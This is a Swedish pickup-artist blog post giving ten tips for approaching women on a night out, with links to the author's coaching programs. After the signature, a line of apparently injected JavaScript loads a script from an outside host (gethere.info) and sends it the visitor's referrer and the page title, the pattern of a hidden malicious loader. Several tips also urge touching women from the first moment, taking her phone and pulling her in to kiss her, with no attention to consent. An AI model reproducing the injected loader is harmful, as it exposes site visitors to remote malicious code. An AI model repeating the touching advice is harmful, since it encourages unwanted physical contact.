4177 28 10 tips som du kan använda redan ikväll!

Idag kommer jag bli intervjuad på programmet “Mitt P3” mellan Kl 13-14. Jag kommer prata om oss, vår verksamhet och attraktion i största allmänhet.

Igår var det alla hjärtans dag och idag är det party på stan som gäller! Jag ska därför ger er 10 korta tips på vad ni kan göra redan ikväll för att bättre på er framgång med det täcka könet.

1. Gå ut och ha kul
Inget kommer någonsin hända om du inte lämnar ditt hem. Anser du inte dig redo? Sanningen är att du aldrig kommer att vara redo. Den bästa skolan är ute på “fältet”. Gå ut och ställ dig mitt i korselden så kommer du att lära dig från alla interaktioner med tjejer – oavsett hur de går.

2. Var inte full
Var inte den fulla typen som endast vågar ta kontakt när han är “aspackad”. Drick med måtta. Tjejer hatar killar som är “modiga” nog att ta kontakt endast när de är fulla. Du förlorar din sociala kalibrering och kommer att missa en massa detaljer om du är full

3. Ta kontakt!
Var den som tar initiativ, gå fram till både killar och tjejer starta en konversation. Ett bra sätt att öppna ett samtal med är är “Hej vet ni när bandet börjar spela?. Mer om inledningsfraser tar vi upp på vår intervju serie, som du kan ladda ner gratis på följande länk.

http://www.c-r.se/wp-content/uploads/media/CR_Intervjuserie_-_Vol1_Att_Oppna.mp3

4. Le
Människor ler tillbaka om du ler. Vad du än säger – LE! Människor kommer ha kul med dig om du har kul och du kommer att KÄNNA DIG attraktiv!

5. Ställ inte intervjufrågor
Prata om något lättsamt och intressant. Ett exempel är att brygga över till en historia/berättelse som hänt dig eller någon vän. En bra brygga är “det här påminner mig om när….”
OBS! skryt inte, det är otroligt genomskinligt och går bort direkt.

6. Beröring
Berör människor redan från första sekunden du inleder en konversation, börja lätt med att beröra vid axlar, “high fives” till lätta kramar. Om du inte berör från början så kommer det kännas konstigt senare när du bestämmer dig för att göra det, till exempel om du går in för kyssen. Låt henne bli van vid din kroppskontakt redan från början.

7. Gå in direkt! Tveka inte!
Ser du en tjej som du vill prata med så gå dit direkt! Vänta inte på att samla mod eller så för det kommer aldrig komma! Du kommer aldrig någonsin komma fram till en bra anledning att gå fram, men tusen anledningar till att INTE gå fram! Den andra faktorn är att hon kommer att märka att du samlar mod och därför bli lite ”creeped out”. Den tredje faktorn är att du aldrig vet vad som kan hända under tiden – hon och hennes polare kanske går därifrån? Så för guds skull, vänta INTE!

8. Smöra inte eller lisma inte
Var inte snäll mot tjejer! Var inte heller taskig mot tjejer… Var dig själv mot tjejer. Att vara blyg är inte att vara sig själv. Att skryta och bara säga en massa bra saker om sig själv är inte att vara sig själv! Grejen med klyschan ”Var dig själv” är att den stämmer BARA om man faktiskt är sig själv (och helst sitt bästa jag). Frågan kommer då ”hur är jag som jag ska vara mot tjejer?”
Enkelt, fråga dig hur du är mot dina polare. Retas du med dina polare? Retas då med tjejer! Säg att de har små, gulliga öron och att de ser ut som älvor, kalla dem för busungar. Pratar du fritt om allt och alla med dina polare? Prata då fritt och avslappnat med tjejer! – Ha kul!

9. Ta det inte personligt
Döda ditt ego! Tro inte att du kan få alla brudar för det är en omöjlighet! Tänk mer i vad du vill åstadkomma! Tänk mer i att du vill lära dig bli bra på att träffa och konversera med kvinnor istället för att få allt och alla eller kanske till och med denna specifika och ”speciella” kvinna.

På samma sätt ska ni inte heller känna er ”dissade” för att ni inte lyckades! Ta det inte personligt av den enkla anledningen att det inte är dig hon dissar utan DEN LILLA DELEN AV DIG som hon fick se. (oftast är det sättet HUR hon fick se det som hon dissar) Så ta inget personligt – ta det som feedback!

10. Led och ta initiativ
Du ser en kvinna och tycker hon är snygg. Du vill ha henne i ditt liv. Du vill, du vill och du vill. Så länge det inte är julafton och hon är tomtens kvinnliga version så kommer hon inte att ge sig själv till dig bara sådär. Du måste ta initiativet och leda det till det mål du vill ha det!

Detta går ut över alla aspekter men rent praktiskt innebär det: Ta hennes hand i din och säg bestämt (men INTE våldsamt) att ni ska sätta er och uppleva äventyr. Led henne senare någonstans där det är mysigt. Ta senare hennes hand igen och gå någon annanstans för att uppleva nya saker! Ta hennes telefon och lägg in ditt nummer. Dra henne till dig och kyss henne. LED PÅ EGEN HAND OCH VAR EN MAN!

Om du vill läsa mer om våra program gör det följande länk. http://www.c-r.se/bootcamp/

Vi kommer också att ha ett seminarium i Stockholm i april, läs mer om det här: http://www.c-r.se/warm-alpha-seminar-den-naturliga-vagen/

Ha en skön Fredag!

Mycket kärlek

-Victor (Sanji)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;